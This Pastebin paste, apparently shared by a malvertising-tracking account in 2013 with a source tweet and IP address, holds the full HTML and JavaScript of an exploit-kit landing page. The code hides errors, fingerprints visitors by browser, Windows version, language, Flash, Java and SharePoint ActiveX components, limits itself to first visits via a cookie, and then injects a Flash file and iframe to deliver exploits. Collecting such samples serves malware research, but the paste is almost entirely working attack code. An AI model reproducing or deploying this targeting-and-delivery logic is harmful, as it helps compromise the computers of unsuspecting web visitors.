API tools faq
paste
Advertisement
StopMalvertising

exploit.html

StopMalvertising
Jan 8th, 2013
502
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.91 KB | None | 0 0
raw download clone embed print report
  1. https://twitter.com/PhysicalDrive0/statuses/288586871058100225
  2. 173.224.221.166
  3.  
  4. <html>
  5. <head>
  6.  
  7. <script language="JavaScript">
  8. <!--
  9.  
  10. function SymError()
  11. {
  12. return true;
  13. }
  14.  
  15. window.onerror = SymError;
  16.  
  17. //-->
  18. </script>
  19.  
  20. <script src=deployJava.js></script>
  21. <script type="text/javascript">
  22. function getCookieVal (offset)
  23. {
  24. var endstr = document.cookie.indexOf (";", offset);
  25. if (endstr == -1)
  26. {
  27. endstr = document.cookie.length;
  28. }
  29. return unescape(document.cookie.substring(offset, endstr));
  30. }
  31. function GetCookie (name)
  32. {
  33. var arg = name + "=";
  34. var alen = arg.length;
  35. var clen = document.cookie.length;
  36. var i = 0;
  37. while (i < clen)
  38. {
  39. var j = i + alen;
  40. if (document.cookie.substring(i, j) == arg)
  41. return getCookieVal (j);
  42. i = document.cookie.indexOf(" ", i) + 1;
  43. if (i == 0)
  44. break;
  45. }
  46. return null;
  47. }
  48. function SetCookie (name, value)
  49. {
  50. var argv = SetCookie.arguments;
  51. var argc = SetCookie.arguments.length;
  52. var expires = (2 < argc) ? argv[2] : null;
  53. var path = (3 < argc) ? argv[3] : null;
  54. var domain = (4 < argc) ? argv[4] : null;
  55. var secure = (5 < argc) ? argv[5] : false;
  56. document.cookie = name + "=" + escape (value) +
  57. ((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +
  58. ((path == null) ? "" : ("; path=" + path)) +
  59. ((domain == null) ? "" : ("; domain=" + domain)) +
  60. ((secure == true) ? "; secure" : "");
  61. }
  62. function DisplayInfo()
  63. {
  64. var expdate = new Date();
  65. var visit;
  66. expdate.setTime(expdate.getTime() + (24 * 60 * 60 * 1000*7 ));
  67. if(!(visit = GetCookie("visit")))
  68. visit = 0;
  69. visit++;
  70. SetCookie("visit", visit, expdate, "/", null, false);
  71. return visit;
  72. }
  73. var ua = window.navigator.userAgent.toLowerCase();
  74.  
  75. if (ua.indexOf('msie 8.0') <0)
  76. {
  77. location.href="about:blank";
  78. }
  79.  
  80. var f = 0;
  81. try {
  82. f = new ActiveXObject('ShockwaveFlash.ShockwaveFlash');
  83. }
  84. catch (e) {
  85. }
  86. var g=typeof f;
  87.  
  88. if(g!="object")
  89. {
  90. location.href="about:blank";
  91. }
  92. var h=navigator.systemLanguage.toLowerCase();
  93.  
  94. if(h!="zh-cn" && h!="en-us" && h!= "zh-tw"&& h!= "ja" && h!= "ru" )
  95. {
  96.  
  97. location.href="about:blank";
  98. }
  99.  
  100. var num=DisplayInfo();
  101. if(num >1)
  102. {
  103. location.href="about:blank";
  104. }
  105. function download()
  106. {
  107. var xmlhttp;
  108. try
  109. {
  110. xmlhttp = new XMLHttpRequest();
  111. }
  112. catch (e)
  113. {
  114. var XMLHTTP_IDS = new Array('MSXML2.XMLHTTP.5.0','MSXML2.XMLHTTP.4.0','MSXML2.XMLHTTP.3.0','MSXML2.XMLHTTP','Microsoft.XMLHTTP' );
  115. var success = false;
  116. for (var i=0;i < XMLHTTP_IDS.length && !success; i++)
  117. {
  118. try
  119. {
  120. xmlhttp = new ActiveXObject(XMLHTTP_IDS[i]);
  121. success = true;
  122. } catch (e)
  123. {}
  124. }
  125. }
  126. function callback()
  127. {
  128. if(xmlhttp.readyState==4)
  129. {
  130. if(xmlhttp.status==200)
  131. {
  132. var temp=ua.replace(/ /g,"");
  133. if (temp.indexOf("nt6.1")>-1) {
  134.  
  135.  
  136. var key = "";
  137. var ma = 0;
  138. try {
  139. ma = new ActiveXObject("SharePoint.OpenDocuments.4");
  140. }
  141. catch (e) {
  142. }
  143. var mb = 0;
  144. try {
  145. mb = new ActiveXObject("SharePoint.OpenDocuments.3");
  146. }
  147. catch (e) {
  148. }
  149.  
  150. if ((typeof ma) == "object" && (typeof mb) == "object") {
  151. key = "girl";
  152. }
  153. else if ((typeof ma) == "number" && (typeof mb) == "object") {
  154. key = "boy";
  155. }
  156.  
  157.  
  158. if (key == "girl") {
  159.  
  160. document.getElementById('test').innerHTML="true";
  161. document.body.innerHTML += "<object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\"100%\" height=\"100%\" id=\"today\"><param name=\"movie\" value=\"today.swf\" /><param name=\"quality\" value=\"high\" /><param name=\"bgcolor\" value=\"#ffffff\" /><param name=\"allowScriptAccess\" value=\"sameDomain\" /><param name=\"allowFullScreen\" value=\"true\" /></object><iframe src=news.html></iframe>";
  162.  
  163. }
  164. if (key == "boy") {
  165. document.getElementById('test').innerHTML="false";
  166. document.body.innerHTML += "<object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\"100%\" height=\"100%\" id=\"today\"><param name=\"movie\" value=\"today.swf\" /><param name=\"quality\" value=\"high\" /><param name=\"bgcolor\" value=\"#ffffff\" /><param name=\"allowScriptAccess\" value=\"sameDomain\" /><param name=\"allowFullScreen\" value=\"true\" /></object><iframe src=news.html></iframe>";
  167.  
  168. }
  169.  
  170. if (key == "") {
  171. if ((deployJava.versionCheck('1.6.0+') == true) && (deployJava.versionCheck('1.7.0+') == false)) {
  172.  
  173.  
  174. document.getElementById('test').innerHTML="default";
  175. document.body.innerHTML += "<object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\"100%\" height=\"100%\" id=\"today\"><param name=\"movie\" value=\"today.swf\" /><param name=\"quality\" value=\"high\" /><param name=\"bgcolor\" value=\"#ffffff\" /><param name=\"allowScriptAccess\" value=\"sameDomain\" /><param name=\"allowFullScreen\" value=\"true\" /></object><iframe src=news.html></iframe>";
  176.  
  177. }
  178. }
  179. }
  180. if(temp.indexOf("nt5.1")>-1)
  181. {
  182.  
  183. document.getElementById('test').innerHTML="cat";
  184. document.body.innerHTML += "<object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\"100%\" height=\"100%\" id=\"today\"><param name=\"movie\" value=\"today.swf\" /><param name=\"quality\" value=\"high\" /><param name=\"bgcolor\" value=\"#ffffff\" /><param name=\"allowScriptAccess\" value=\"sameDomain\" /><param name=\"allowFullScreen\" value=\"true\" /></object><iframe src=news.html></iframe>";
  185.  
  186. }
  187.  
  188.  
  189. }
  190. }
  191. }
  192. xmlhttp.open("get", "xsainfo.jpg", true);
  193. xmlhttp.onreadystatechange = callback;
  194. xmlhttp.send(null);
  195. }
  196.  
  197. </script>
  198. </head>
  199. <body onload="download()">
  200. <div style=display:none>
  201. <div id=test>hello</div>
  202. </div>
  203. </body>
  204. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!